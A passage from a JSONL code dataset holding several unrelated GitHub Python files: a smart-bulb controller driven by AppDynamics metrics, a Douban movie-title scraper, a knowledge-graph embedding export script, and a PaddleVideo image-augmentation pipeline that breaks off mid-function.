count'),\n ('time-range-type', 'BEFORE_NOW'),\n ('duration-in-mins', '1'),\n ('output', 'json')\n )\n response = requests.get('https://hackathon-emea.saas.appdynamics.com/controller/rest/applications/AppDynamics%20Analytics-145/metric-data', params=params, auth=('USER', 'PASS'))\n pers_count_appd = response.json()[0]['metricValues'][0]['current']\n return pers_count_appd\n\n# Get lights, api objects\ndef init():\n conf = load_json(CONFIG_FILE)\n try:\n identity = conf[args.host].get('identity')\n psk = conf[args.host].get('key')\n api_factory = APIFactory(host=args.host, psk_id=identity, psk=psk)\n except KeyError:\n identity = uuid.uuid4().hex\n api_factory = APIFactory(host=args.host, psk_id=identity)\n try:\n psk = api_factory.generate_psk(args.key)\n print('Generated PSK: ', psk)\n\n conf[args.host] = {'identity': identity,\n 'key': psk}\n save_json(CONFIG_FILE, conf)\n except AttributeError:\n raise PytradfriError(\"Please provide the 'Security Code' on the \"\n \"back of your Tradfri gateway using the \"\n \"-K flag.\")\n\n api = api_factory.request\n\n gateway = Gateway()\n\n devices_command = gateway.get_devices()\n devices_commands = api(devices_command)\n devices = api(devices_commands)\n\n lights = [dev for dev in devices if dev.has_light_control]\n return lights,api\n\ndef set_light(lights, api, myvalue):\n my_command = lights[0].light_control.set_dimmer(myvalue)\n api(my_command)\n\nlights, api = init()\non_off = (lights[0].light_control.lights[0].state)\ndim_state = (lights[0].light_control.lights[0].dimmer)\n\n# Loop and decide whether to dim the bulb, etc.\nwhile True:\n pers_count_appd = query_appd_metric()\n if pers_count_appd > 0 and not on_off:\n lights, api = init()\n set_light(lights, api, 128)\n last_state = 128\n on_off = True\n elif pers_count_appd == 0 and on_off:\n lights, api = init()\n set_light(lights, api, 0)\n on_off = False\n time.sleep(10)\n","repo_name":"CiscoSE/smarterspaces","sub_path":"tradfri/change_bulb.py","file_name":"change_bulb.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70694416747","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom bs4 import Tag\n\n# 豆��top25的url\nurl = \"https://movie.douban.com/top250?start=0&filter=\"\n\n# 发出请求,伪装爬虫为浏览器,使用用户代理\"User-Agent\"\nresp = requests.get(url=url, headers={\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (\"\n \"KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 \"\n \"Edg/91.0.864.59\"})\n\n# 解析响应报文\nsoup = BeautifulSoup(markup=resp.text, features=\"lxml\")\n\n# 定位\"div class='hd'的标签\"\ncontent_div_hd = soup.find_all(name=\"div\", class_=\"hd\") # type: list[Tag]\n\n# 取出中文标题,title这个class的第一个\ncontent_all = []\nfor div_hd in content_div_hd:\n content_all.append(\n div_hd.find_all(name=\"span\", class_=\"title\", limit=1)[0]\n )\n\n# 剥去html标签及标题的空格,取出所有的标题\ntitles = [content.text.strip() for content in content_all]\n\n# 找怦然心动是不是top25\nif \"怦然心动\" in titles:\n print(\"怦然心动是豆瓣top25电影\")\n","repo_name":"cutelittletiantian/python-web-crawler","sub_path":"02-爬文字、反爬规避之用户代理伪装爬虫、批量方法/demo02-1爬豆瓣电影Top25找《怦然心动》.py","file_name":"demo02-1爬豆瓣电影Top25找《怦然心动》.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"19305189387","text":"import torch\nimport os.path as osp\n\nfrom data.dataset import FB15Dataset\nfrom dataloader import DataLoader\nfrom model import KBNet\n\n\ndef save_embeddings(run_dir, dataset):\n h_size = 200\n o_size = 200\n heads = 2\n margin = 1\n dev = 'cuda'\n\n data_loader = DataLoader(dataset)\n x, g, graph = data_loader.load_train(dev)\n edge_idx, edge_type = data_loader.graph2idx(graph, dev)\n\n # determine input size\n x_size = x.shape[1]\n g_size = g.shape[1]\n\n encoder = KBNet(x_size, g_size, h_size, o_size, heads, margin, device=dev)\n path = osp.join(run_dir, 'encoder.pt')\n model_dict = torch.load(path)\n encoder.load_state_dict(model_dict['model_state_dict'])\n\n encoder.eval()\n with torch.no_grad():\n h, g = encoder(x, g, edge_idx, edge_type)\n dataset.save_embedding(h, g)\n\n\nfb = FB15Dataset()\nrun_dir = './wandb/run-20200324_163404-ozrio67g/'\nsave_embeddings(run_dir, fb)\n","repo_name":"TraianVidrascu/DGAT","sub_path":"auxilary.py","file_name":"auxilary.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7012319723","text":"import math\nimport random\nfrom collections.abc import Sequence\n\nimport cv2\nimport numpy as np\nimport paddle\nimport paddle.nn.functional as F\nfrom PIL import Image\n\nfrom ..registry import PIPELINES\n\n\n@PIPELINES.register()\nclass Scale(object):\n \"\"\"\n Scale images.\n Args:\n short_size(float | int): Short size of an image will be scaled to the short_size.\n fixed_ratio(bool): Set whether to zoom according to a fixed ratio. default: True\n do_round(bool): Whether to round up when calculating the zoom ratio. default: False\n backend(str): Choose pillow or cv2 as the graphics processing backend. default: 'pillow'\n \"\"\"\n def __init__(self,\n short_size,\n fixed_ratio=True,\n keep_ratio=None,\n do_round=False,\n backend='pillow'):\n self.short_size = short_size\n assert (fixed_ratio and not keep_ratio) or (not fixed_ratio), \\\n f\"fixed_ratio and keep_ratio cannot be true at the same time\"\n self.fixed_ratio = fixed_ratio\n self.keep_ratio = keep_ratio\n self.do_round = do_round\n\n assert backend in [\n 'pillow', 'cv2'\n ], f\"Scale's backend must be pillow or cv2, but get {backend}\"\n self.backend = backend\n\n def __call__(self, results):\n \"\"\"\n Performs resize operations.\n Args:\n imgs (Sequence[PIL.Image]): List where each item is a PIL.Image.\n For example, [PIL.Image0, PIL.Image1, PIL.Image2, ...]\n return:\n resized_imgs: List where each item is a PIL.Image after scaling.\n \"\"\"\n imgs = results['imgs']\n resized_imgs = []\n for i in range(len(imgs)):\n img = imgs[i]\n if isinstance(img, np.ndarray):\n h, w, _ = img.shape\n elif isinstance(img, Image.Image):\n w, h = img.size\n else:\n raise NotImplementedError\n\n if w <= h:\n ow = self.short_size\n if self.fixed_ratio:\n oh = int(self.short_size * 4.0 / 3.0)\n elif not self.keep_ratio: # no\n oh = self.short_size\n else:\n scale_factor = self.short_size / w\n oh = int(h * float(scale_factor) +\n 0.5) if self.do_round else int(h *\n self.short_size / w)\n ow = int(w * float(scale_factor) +\n 0.5) if self.do_round else int(w *\n self.short_size / h)\n else:\n oh = self.short_size\n if self.fixed_ratio:\n ow = int(self.short_size * 4.0 / 3.0)\n elif not self.keep_ratio: # no\n ow = self.short_size\n else:\n scale_factor = self.short_size / h\n oh = int(h * float(scale_factor) +\n 0.5) if self.do_round else int(h *\n self.short_size / w)\n ow = int(w * float(scale_factor) +\n 0.5) if self.do_round else int(w *\n self.short_size / h)\n if self.backend == 'pillow':\n resized_imgs.append(img.resize((ow, oh), Image.BILINEAR))\n elif self.backend == 'cv2' and (self.keep_ratio is not None):\n resized_imgs.append(\n cv2.resize(img, (ow, oh), interpolation=cv2.INTER_LINEAR))\n else:\n resized_imgs.append(\n Image.fromarray(\n cv2.resize(np.asarray(img), (ow, oh),\n interpolation=cv2.INTER_LINEAR)))\n results['imgs'] = resized_imgs\n return results\n\n\n@PIPELINES.register()\nclass RandomCrop(object):\n \"\"\"\n Random crop images.\n Args:\n target_size(int): Random crop a square with the target_size from an image.\n \"\"\"\n def __init__(self, target_size):\n self.target_size = target_size\n\n def __call__(self, results):\n \"\"\"\n Performs random crop operations.\n Args:\n imgs: List where each item is a PIL.Image.\n For example, [PIL.Image0, PIL.Image1, PIL.Image2, ...]\n return:\n crop_imgs: List where each item is a PIL.Image after random crop.\n \"\"\"\n imgs = results['imgs']\n if 'backend' in results and results['backend'] == 'pyav': # [c,t,h,w]\n h, w = imgs.shape[2:]\n else:\n w, h = imgs[0].size\n th, tw = self.target_size, self.target_size\n\n assert (w >= self.target_size) and (h >= self.target_size), \\\n \"image width({}) and height({}) should be larger than crop size\".format(\n w, h, self.target_size)\n\n crop_images = []\n if 'backend' in results and results['backend'] == 'pyav':\n x1 = np.random.randint(0, w - tw)\n y1 = np.random.randint(0, h - th)\n crop_images = imgs[:, :, y1:y1 + th, x1:x1 + tw] # [C, T, th, tw]\n else:\n x1 = random.randint(0, w - tw)\n y1 = random.randint(0, h - th)\n for img in imgs:\n if w == tw and h == th:\n crop_images.append(img)\n else:\n crop_images.append(img.crop((x1, y1, x1 + tw, y1 + th)))\n results['imgs'] = crop_images\n return results\n\n\n@PIPELINES.register()\nclass RandomResizedCrop(RandomCrop):\n def __init__(self,\n area_range=(0.08, 1.0),\n aspect_ratio_range=(3 / 4, 4 / 3),\n target_size=224,\n backend='cv2'):\n\n self.area_range = area_range\n self.aspect_ratio_range = aspect_ratio_range\n self.target_size = target_size\n self.backend = backend\n\n @staticmethod\n def get_crop_bbox(img_shape,\n area_range,\n aspect_ratio_range,\n max_attempts=10):\n\n assert 0 < area_range[0] <= area_range[1] <= 1\n assert 0 < aspect_ratio_range[0] <= aspect_ratio_range[1]\n\n img_h, img_w = img_shape\n area = img_h * img_w\n\n min_ar, max_ar = aspect_ratio_range\n aspect_ratios = np.exp(\n np.random.uniform(np.log(min_ar), np.log(max_ar),\n size=max_attempts))\n target_areas = np.random.uniform(*area_range, size=max_attempts) * area\n candidate_crop_w = np.round(np.sqrt(target_areas *\n aspect_ratios)).astype(np.int32)\n candidate_crop_h = np.round(np.sqrt(target_areas /\n aspect_ratios)).astype(np.int32)\n\n for i in range(max_attempts):\n crop_w = candidate_crop_w[i]\n crop_h = candidate_crop_h[i]\n if crop_h <= img_h and crop_w <= img_w:\n x_offset = random.randint(0, img_w - crop_w)\n y_offset = random.randint(0, img_h - crop_h)\n return x_offset, y_offset, x_offset + crop_w, y_offset + crop_h\n\n # Fallback\n crop_size = min(img_h, img_w)\n x_offset = (img_w - crop_size) // 2\n y_offset = (img_h - crop_size) // 2\n return x_offset, y_offset, x_offset + crop_size, y_offset + crop_size\n\n def __call__(self, results):\n imgs = results['imgs']\n if self.backend == 'pillow':\n img_w, img_h = imgs[0].size\n elif self.backend == 'cv2':\n img_h, img_w, _ = imgs[0].shape\n elif self.backend == 'pyav':\n img_h, img_w = imgs.shape[2:] # [cthw]\n else:\n raise NotImplementedError\n\n left, top, right, bottom = self.get_crop_bbox(\n (img_h, img_w), self.area_range, self.aspect_ratio_range)\n\n if self.backend == 'pillow':\n img_w, img_h = imgs[0].size\n imgs = [img.crop(left, top, right, bottom) for img in imgs]\n elif self.backend == 'cv2':\n img_h, img_w, _ = imgs[0].shape\n imgs = [img[top:bottom, left:right] for img in imgs]\n elif self.backend == 'pyav':\n img_h, img_w = imgs.shape[2:] # [cthw]\n imgs = imgs[:, :, top:bottom, left:right]\n else:\n raise NotImplementedError\n results['imgs'] = imgs\n return results\n\n\n@PIPELINES.register()\nclass CenterCrop(object):\n \"\"\"\n Center crop images.\n Args:\n target_size(int): Center crop a square with the target_size from an image.\n do_round(bool): Whether to round up the coordinates of the upper left corner of the cropping area. default: True\n \"\"\"\n def __init__(self, target_size, do_round=True, backend='pillow'):\n self.target_size = target_size\n self.do_round = do_round\n self.backend = backend\n\n def __call__(self, results):\n \"\"\"\n Performs Center crop operations.\n Args:\n imgs: List where each item is a PIL.Image.\n For example, [PIL.Image0, PIL.Image1, PIL.Image2, ...]\n return:\n ccrop_imgs: List where each item is a PIL.Image after Center crop.\n \"\"\"\n imgs = results['imgs']\n ccrop_imgs = []\n th, tw = self.target_size, self.target_size\n if isinstance(imgs, paddle.Tensor):\n h, w = imgs.shape[-2:]\n x1 = int(round((w - tw) / 2.0)) if self.do_round else (w - tw) // 2\n y1 = int(round((h - th) / 2.0)) if self.do_round else (h - th) // 2\n ccrop_imgs = imgs[:, :, y1:y1 + th, x1:x1 + tw]\n else:\n for img in imgs:\n if self.backend == 'pillow':\n w, h = img.size\n elif self.backend == 'cv2':\n h, w, _ = img.shape\n else:\n raise NotImplementedError\n assert (w >= self.target_size) and (h >= self.target_size), \\\n \"image width({}) and height({}) should be larger than crop size\".format(\n w, h, self.target_size)\n x1 = int(round(\n (w - tw) / 2.0)) if self.do_round else (w - tw) // 2\n y1 = int(round(\n (h - th) / 2.0)) if self.do_round else (h - th) // 2\n if self.backend == 'cv2':\n ccrop_imgs.append(img[y1:y1 + th, x1:x1 + tw])\n elif self.backend == 'pillow':\n ccrop_imgs.append(img.crop((x1, y1, x1 + tw, y1 + th)))\n results['imgs'] = ccrop_imgs\n return results\n\n\n@PIPELINES.register()\nclass MultiScaleCrop(object):\n \"\"\"\n Random crop images in with multiscale sizes\n Args:\n target_size(int): Random crop a square with the target_size from an image.\n scales(int): List of candidate cropping scales.\n max_distort(int): Maximum allowable deformation combination distance.\n fix_crop(int): Whether to fix the cutting start point.\n allow_duplication(int): Whether to allow duplicate candidate crop starting points.\n more_fix_crop(int): Whether to allow more cutting starting points.\n \"\"\"\n def __init__(\n self,\n target_size, # NOTE: named target size now, but still pass short size in it!\n scales=None,\n max_distort=1,\n fix_crop=True,\n allow_duplication=False,\n more_fix_crop=True,\n backend='pillow'):\n\n self.target_size = target_size\n self.scales = scales if scales else [1, .875, .75, .66]\n self.max_distort = max_distort\n self.fix_crop = fix_crop\n self.allow_duplication = allow_duplication\n self.more_fix_crop = more_fix_crop\n assert backend in [\n 'pillow', 'cv2'\n ], f\"MultiScaleCrop's backend must be pillow or cv2, but get {backend}\"\n self.backend = backend\n\n def __call__(self, results):\n \"\"\"\n Performs MultiScaleCrop operations.\n Args:\n imgs: List where wach item is a PIL.Image.\n XXX:\n results:\n\n \"\"\"\n imgs = results['imgs']\n\n input_size = [self.target_size, self.target_size]\n\n im_size = imgs[0].size\n\n # get random crop offset\n def _sample_crop_size(im_size):\n image_w, image_h = im_size[0], im_size[1]\n\n base_size = min(image_w, image_h)\n crop_sizes = [int(base_size * x) for x in self.scales]\n crop_h = [\n input_size[1] if abs(x - input_size[1]) < 3 else x\n for x in crop_sizes\n ]\n crop_w = [\n input_size[0] if abs(x - input_size[0]) < 3 else x\n for x in crop_sizes\n ]\n\n pairs = []\n for i, h in enumerate(crop_h):\n for j, w in enumerate(crop_w):\n if abs(i - j) <= self.max_distort:\n pairs.append((w, h))\n crop_pair = random.choice(pairs)\n if not self.fix_crop:\n w_offset = random.randint(0, image_w - crop_pair[0])\n h_offset = random.randint(0, image_h - crop_pair[1])\n else:\n w_step = (image_w - crop_pair[0]) / 4\n h_step = (image_h - crop_pair[1]) / 4\n\n ret = list()\n ret.append((0, 0)) # upper left\n if self.allow_duplication or w_step != 0:\n ret.append((4 * w_step, 0)) # upper right\n if self.allow_duplication or h_step != 0:\n ret.append((0, 4 * h_step)) # lower left\n if self.allow_duplication or (h_step != 0 and w_step != 0):\n ret.append((4 * w_step, 4 * h_step)) # lower right\n if self.allow_duplication or (h_step != 0 or w_step != 0):\n ret.append((2 * w_step, 2 * h_step)) # center\n\n if self.more_fix_crop:\n ret.append((0, 2 * h_step)) # center left\n ret.append((4 * w_step, 2 * h_step)) # center right\n ret.append((2 * w_step, 4 * h_step)) # lower center\n ret.append((2 * w_step, 0 * h_step)) # upper center\n\n ret.append((1 * w_step, 1 * h_step)) # upper left quarter\n ret.append((3 * w_step, 1 * h_step)) # upper right quarter\n ret.append((1 * w_step, 3 * h_step)) # lower left quarter\n ret.append((3 * w_step, 3 * h_step)) # lower righ quarter\n\n w_offset, h_offset = random.choice(ret)\n\n return crop_pair[0], crop_pair[1], w_offset, h_offset\n\n crop_w, crop_h, offset_w, offset_h = _sample_crop_size(im_size)\n crop_img_group = [\n img.crop((offset_w, offset_h, offset_w + crop_w, offset_h + crop_h))\n for img in imgs\n ]\n if self.backend == 'pillow':\n ret_img_group = [\n img.resize((input_size[0], input_size[1]), Image.BILINEAR)\n for img in crop_img_group\n ]\n else:\n ret_img_group = [\n Image.fromarray(\n cv2.resize(np.asarray(img),\n dsize=(input_size[0], input_size[1]),\n interpolation=cv2.INTER_LINEAR))\n for img in crop_img_group\n ]\n results['imgs'] = ret_img_group\n return results\n\n\n@PIPELINES.register()\nclass RandomFlip(object):\n \"\"\"\n Random Flip images.\n Args:\n p(float): Random flip images with the probability p.\n \"\"\"\n def __init__(self, p=0.5):\n self.p = p\n\n def __call__(self, results):\n \"\"\"\n Performs random flip operations.\n Args:\n imgs: List where each item is a PIL.Image.\n For example, [PIL.Image0, PIL.Image1, PIL.Image2, ...]\n return:\n flip_imgs: List where each item is a PIL.Image after random flip.\n \"\"\"\n imgs = results['imgs']\n v = random.random()\n if v < self.p:\n if isinstance(imgs, paddle.Tensor):\n results['imgs'] = paddle.flip(imgs, axis=[3])\n elif isinstance(imgs[0], np.ndarray):\n results['imgs'] = [cv2.flip(img, 1, img) for img in imgs\n ] # [[h,w,c], [h,w,c], ..., [h,w,c]]\n else:\n results['imgs'] = [\n img.transpose(Image.FLIP_LEFT_RIGHT) for img in imgs\n ]\n else:\n results['imgs'] = imgs\n return results\n\n\n@PIPELINES.register()\nclass Image2Array(object):\n \"\"\"\n transfer PIL.Image to Numpy array and transpose dimensions from 'dhwc' to 'dchw'.\n Args:\n transpose: whether to transpose or not, default True, False for slowfast.\n \"\"\"\n def __init__(self, transpose=True, data_format='tchw'):\n assert data_format in [\n 'tchw', 'cthw'\n ], f\"Target format must in ['tchw', 'cthw'], but got {data_format}\"\n self.transpose = transpose\n self.data_format = data_format\n\n def __call__(self, results):\n \"\"\"\n Performs Image to NumpyArray operations.\n Args:\n imgs: List where each item is a PIL.Image.\n For example, [PIL.Image0, PIL.Image1, PIL.Image2, ...]\n return:\n np_imgs: Numpy array.\n \"\"\"\n imgs = results['imgs']\n if 'backend' in results and results[\n 'backend'] == 'pyav': # [T,H,W,C] in [0, 1]\n if self.transpose:\n if self.data_format == 'tchw':\n t_imgs = imgs.transpose((0, 3, 1, 2)) # tchw\n else:\n t_imgs = imgs.transpose((3, 0, 1, 2)) # cthw\n results['imgs'] = t_imgs\n else:\n t_imgs = np.stack(imgs).astype('float32')\n if self.transpose:\n if self.data_format == 'tchw':\n t_imgs = t_imgs.transpose(0, 3, 1, 2) # tchw\n else:\n t_imgs = t_imgs.transpose(3, 0, 1, 2) # cthw\n results['imgs'] = t_imgs\n return results\n\n\n@PIPELINES.register()\nclass Normalization(object):\n \"\"\"\n Normalization.\n Args:\n mean(Sequence[float]): mean values of different channels.\n std(Sequence[float]): std values of different channels.\n tensor_shape(list): size of mean, default [3,1,1]. For slowfast, [1,1,1,3]\n \"\"\"\n def __init__(self, mean, std, tensor_shape=[3, 1, 1], inplace=False):\n if not isinstance(mean, Sequence):\n raise TypeError(\n f'Mean must be list, tuple or np.ndarray, but got {type(mean)}')\n if not isinstance(std, Sequence):\n raise TypeError(\n f'Std must be list, tuple or np.ndarray, but got {type(std)}')\n\n self.inplace = inplace\n if not inplace:\n self.mean = np.array(mean).reshape(tensor_shape).astype(np.float32)\n self.std = np.array(std).reshape(tensor_shape).astype(np.float32)\n else:\n self.mean = np.array(mean, dtype=np.float32)\n self.std = np.array(std, dtype=np.float32)\n\n def __call__(self, results):\n \"\"\"\n Performs normalization operations.\n Args:\n imgs: Numpy array.\n return:\n np_imgs: Numpy array after normalization.\n \"\"\"\n if self.inplace:\n n = len(results['imgs'])\n h, w, c = results['imgs'][0].shape\n norm_imgs = np.empty((n, h, w, c), dtype=np.float32)\n for i, img in enumerate(results['imgs']):\n norm_imgs[i] = img\n\n for img in norm_imgs: # [n,h,w,c]\n mean = np.float64(self.mean.reshape(1, -1)) # [1, 3]\n stdinv = 1 / np.float64(self.std.reshape(1, -1)) # [1, 3]\n cv2.subtract(img, mean, img)\n cv2.multiply(img, stdinv, img)\n else:\n imgs = results['imgs']\n norm_imgs = imgs / 255.0\n norm_imgs -= self.mean\n norm_imgs /= self.std\n if 'backend' in results and results['backend'] == 'pyav':\n norm_imgs = paddle.to_tensor(norm_imgs, dtype=paddle.float32)\n results['imgs'] = norm_imgs\n return results\n\n\n@PIPELINES.register()\nclass JitterScale(object):\n \"\"\"\n Scale image, while the target short size is randomly select between min_size and max_size.\n Args:\n min_size: Lower bound for random sampler.\n max_size: Higher bound for random sampler.\n \"\"\"\n def __init__(self,\n min_size,\n max_size,\n short_cycle_factors=[0.5, 0.7071],\n default_min_size=256):\n self.default_min_size = default_min_size\n self.orig_min_size = self.min_size = min_size\n self.max_size = max_size\n self.short_cycle_factors = short_cycle_factors\n\n def __call__(self, results):\n \"\"\"\n Performs jitter resize operations.\n Args:\n imgs (Sequence[PIL.Image]): List where each item is a PIL.Image.\n For example, [PIL.Image0, PIL.Image1, PIL.Image2, ...]\n return:\n resized_imgs: List where each item is a PIL.Image after scaling.\n \"\"\"\n short_cycle_idx = results.get('short_cycle_idx')\n if short_cycle_idx in [0, 1]:\n self.min_size = int(\n round(self.short_cycle_factors[short_cycle_idx] *\n self.default_min_size))\n else:\n self.min_size = self.orig_min_size\n\n imgs = results['imgs']\n size = int(round(np.random.uniform(self.min_size, self.max_size)))\n assert (len(imgs) >= 1), \\\n \"len(imgs):{} should be larger than 1\".format(len(imgs))\n\n if 'backend' in results and results['backend'] == 'pyav':\n height, width = imgs.shape[2:]\n else:\n width, height = imgs[0].size\n if (width <= height and width == size) or (height <= width\n and height == size):\n return results\n\n new_width = size\n new_height = size\n if width < height:\n new_height = int(math.floor((float(height) / width) * size))\n else:\n new_width = int(math.floor((float(width) / height) * size))\n\n if 'backend' in results and results['backend'] == 'pyav':\n frames_resize = F.interpolate(imgs,\n size=(new_height, new_width),\n mode=\"bilinear\",\n align_corners=False) # [c,t,h,w]\n else:\n frames_resize = []\n for j in range(len(imgs)):\n img = imgs[j]\n scale_img = img.resize((new_width, new_height), Image.BILINEAR)\n frames_resize.append(scale_img)\n\n results['imgs'] = frames_resize\n return results\n\n\n@PIPELINES.register()\nclass MultiCrop(object):\n \"\"\"\n Random crop image.\n This operation can perform multi-crop during multi-clip test, as in slowfast model.\n Args:\n target_size(int): Random crop a square with the target_size from an image.\n \"\"\"\n def __init__(self,\n target_size,\n default_crop_size=224,\n short_cycle_factors=[0.5, 0.7071],\n test_mode=False):\n self.orig_target_size = self.target_size = target_size\n self.short_cycle_factors = short_cycle_factors\n self.default_crop_size = default_crop_size\n self.test_mode = test_mode\n\n def __call__(self, results):\n \"\"\"\n Performs random crop operations.\n Args:\n imgs: List where each item is a PIL.Image.\n For example, [PIL.Image0, PIL.Image1, PIL.Image2, ...]\n return:\n crop_imgs: List where each item is a PIL.Image after random crop.\n \"\"\"\n imgs = results['imgs']\n spatial_sample_index = results['spatial_sample_index']\n spatial_num_clips = results['spatial_num_clips']\n\n short_cycle_idx = results.get('short_cycle_idx')\n if short_cycle_idx in [0, 1]:\n self.target_size = int(\n round(self.short_cycle_factors[short_cycle_idx] *\n self.default_crop_size))\n else:\n self.target_size = self.orig_target_size # use saved value before call\n\n w, h = imgs[0].size\n if w == self.target_size and h == self.target_size:\n return results\n\n assert (w >= self.target_size) and (h >= self.target_size), \\\n \"image width({}) and height({}) should be larger than crop size({},{})\".format(w, h, self.target_size, self.target_size)\n frames_crop = []\n if not self.test_mode:\n x_offset = random.randint(0, w - self.target_size)\n y_offset = random.randint(0, h - self.target_size)\n else: # multi-crop\n x_gap = int(\n math.ceil((w - self.target_size) / (spatial_num_clips - 1)))\n y_gap = int(\n math.ceil((h - self.target_size) / (spatial_num_clips - 1)))\n if h > w:\n x_offset = int(math.ceil((w - self.target_size) / 2))\n if spatial_sample_index == 0:\n y_offset = 0\n elif spatial_sample_index == spatial_num_clips - 1:\n y_offset = h - self.target_size\n else:\n y_offset = y_gap * spatial_sample_index\n else:\n y_offset = int(math.ceil((h - self.target_size) / 2))\n if spatial_sample_index == 0:\n x_offset = 0\n elif spatial_sample_index == spatial_num_clips - 1:\n x_offset = w - self.target_size\n else:\n x_offset = x_gap * spatial_sample_index\n\n for img in imgs:\n nimg = img.crop((x_offset, y_offset, x_offset + self.target_size,\n y_offset + self.target_size))\n frames_crop.append(nimg)\n results['imgs'] = frames_crop\n return results\n\n\n@PIPELINES.register()\nclass PackOutput(object):\n \"\"\"\n In slowfast model, we want to get slow pathway from fast pathway based on\n alpha factor.\n Args:\n alpha(int): temporal length of fast/slow\n \"\"\"\n def __init__(self, alpha):\n self.alpha = alpha\n\n def __call__(self, results):\n fast_pathway = results['imgs']\n\n # sample num points between start and end\n slow_idx_start = 0\n slow_idx_end = fast_pathway.shape[0] - 1\n slow_idx_num = fast_pathway.shape[0] // self.alpha\n slow_idxs_select = np.linspace(slow_idx_start, slow_idx_end,\n slow_idx_num).astype(\"int64\")\n slow_pathway = fast_pathway[slow_idxs_select]\n\n # T H W C -> C T H W.\n slow_pathway = slow_pathway.transpose(3, 0, 1, 2)\n fast_pathway = fast_pathway.transpose(3, 0, 1, 2)\n\n # slow + fast\n frames_list = [slow_pathway, fast_pathway]\n results['imgs'] = frames_list\n return results\n\n\n@PIPELINES.register()\nclass GroupFullResSample(object):\n def __init__(self, crop_size, flip=False):\n self.crop_size = crop_size if not isinstance(crop_size, int) else (\n crop_size, crop_size)\n self.flip = flip\n\n def __call__(self, results):\n img_group = results['imgs']\n\n image_w, image_h = img_group[0].size\n crop_w, crop_h = self.crop_size\n\n w_step = (image_w - crop_w) // 4\n h_step = (image_h - crop_h) // 4\n\n offsets = list()\n offsets.append((0 * w_step, 2 * h_step)) # left\n offsets.append((4 * w_step, 2 * h_step)) # right\n offsets.append((2 * w_step, 2 * h_step)) # center\n\n oversample_group = list()\n for o_w, o_h in offsets:\n normal_group = list()\n flip_group = list()\n for i, img in enumerate(img_group):\n crop = img.crop((o_w, o_h, o_w + crop_w, o_h + crop_h))\n normal_group.append(crop)\n if self.flip:\n flip_crop = crop.copy().transpose(Image.FLIP_LEFT_RIGHT)\n flip_group.append(flip_crop)\n\n oversample_group.extend(normal_group)\n if self.flip:\n oversample_group.extend(flip_group)\n\n results['imgs'] = oversample_group\n return results\n\n\n@PIPELINES.register()\nclass TenCrop:\n \"\"\"\n Crop out 5 regions (4 corner points + 1 center point) from the picture,\n and then flip the cropping result to get 10 cropped images, which can make the prediction result more robust.\n Args:\n target_size(int | tuple[int]): (w, h) of target size for crop.\n \"\"\"\n def __init__(self, target_size):\n self.target_size = (target_size, target_size)\n\n def __call__(self, results):\n imgs = results['imgs']\n img_w, img_h = imgs[0].size\n crop_w, crop_h = self.target_size\n w_step = (img_w - crop_w) // 4\n h_step = (img_h - crop_h) // 4\n offsets = [\n (0, 0),\n (4 * w_step, 0),\n (0, 4 * h_step),\n (4 * w_step, 4 * h_step),\n (2 * w_step, 2 * h_step),\n ]\n img_crops = list()\n for x_offset, y_offset in offsets:\n crop = [\n img.crop(\n (x_offset, y_offset, x_offset + crop_w, y_offset + crop_h))\n for img in imgs\n ]\n crop_fliped = [\n timg.transpose(Image.FLIP_LEFT_RIGHT) for timg in crop\n ]\n img_crops.extend(crop)\n img_crops.extend(crop_fliped)\n\n results['imgs'] = img_crops\n return results\n\n\n@PIPELINES.register()\nclass UniformCrop:\n \"\"\"\n Perform uniform spatial sampling on the images,\n select the two ends of the long side and the middle position (left middle right or top middle bottom) 3 regions.\n Args:\n target_size(int | tuple[int]): (w, h) of target size for crop.\n \"\"\"\n def __init__(self, target_size, backend='cv2'):\n if isinstance(target_size, tuple):\n self.target_size = target_size\n elif isinstance(target_size, int):\n self.target_size = (target_size, target_size)\n else:\n raise TypeError(\n f'target_size must be int or tuple[int], but got {type(target_size)}'\n )\n self.backend = backend\n\n def __call__(self, results):\n\n imgs = results['imgs']\n if 'backend' in results and results['backend'] == 'pyav': # [c,t,h,w]\n img_h, img_w = imgs.shape[2:]\n elif self.backend == 'pillow':\n img_w, img_h = imgs[0].size\n else:\n img_h, img_w = imgs[0].shape[:2]\n\n crop_w, crop_h = self.target_size\n if crop_h == img_h:\n w_step = (img_w - crop_w) // 2\n offsets = [\n (0, 0),\n (w_step * 2, 0),\n (w_step, 0),\n ]\n elif crop_w == img_w:\n h_step = (img_h - crop_h) // 2\n offsets = [\n (0, 0),\n (0, h_step * 2),\n (0, h_step),\n ]\n else:\n raise ValueError(\n f\"img_w({img_w}) == crop_w({crop_w}) or img_h({img_h}) == crop_h({crop_h})\"\n )\n img_crops = []\n if 'backend' in results and results['backend'] == 'pyav': # [c,t,h,w]\n for x_offset, y_offset in offsets:\n crop = imgs[:, :, y_offset:y_offset + crop_h,\n x_offset:x_offset + crop_w]\n img_crops.append(crop)\n img_crops = paddle.concat(img_crops, axis=1)\n else:\n if self.backend == 'pillow':\n for x_offset, y_offset in offsets:\n crop = [\n img.crop((x_offset, y_offset, x_offset + crop_w,\n y_offset + crop_h)) for img in imgs\n ]\n img_crops.extend(crop)\n else:\n for x_offset, y_offset in offsets:\n crop = [\n img[y_offset:y_offset + crop_h,\n x_offset:x_offset + crop_w] for img in imgs\n ]\n img_crops.extend(crop)\n results['imgs'] = img_crops\n return results\n\n\n@PIPELINES.register()\nclass GroupResize(object):\n def __init__(self, height, width, scale, K, mode='train'):\n self.height = height\n self.width = width\n self.scale = scale\n self.resize = {}\n self.K = np.array(K, dtype=np.float32)\n self.mode = mode\n for i in range(self.scale):\n s = 2**i\n self.resize[i] = paddle.vision.transforms.Resize(\n (self.height // s, self.width // s), interpolation='lanczos')\n\n def __call__(self, results):\n if self.mode == 'infer':\n imgs = results['imgs']\n for k in list(imgs): # (\"color\", 0, -1)\n if \"color\" in k or \"color_n\" in k:\n n, im, _ = k\n for i in range(self.scale):\n imgs[(n, im, i)] = self.resize[i](imgs[(n, im, i - 1)])\n else:\n 